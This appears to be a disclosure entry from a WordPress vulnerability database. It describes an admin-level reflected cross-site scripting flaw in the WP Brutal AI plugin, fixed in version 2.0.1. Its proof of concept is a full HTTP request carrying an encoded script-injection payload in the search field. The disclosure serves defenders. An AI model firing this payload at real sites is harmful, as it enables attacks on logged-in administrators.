WordPress Plugin Vulnerabilities

WP Brutal AI < 2.0.1 - Admin+ Reflected XSS

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.

Proof of Concept

Send an HTTP request with the following:

```
POST https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Cookie: [Admin+]

search=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&status=
```

Affects Plugins

Fixed in 2.0.1

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Taurus Omar
Submitter
Taurus Omar
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-06-05 (about 11 months ago)
Added
2023-06-05 (about 11 months ago)
Last Updated
2023-06-05 (about 11 months ago)

Other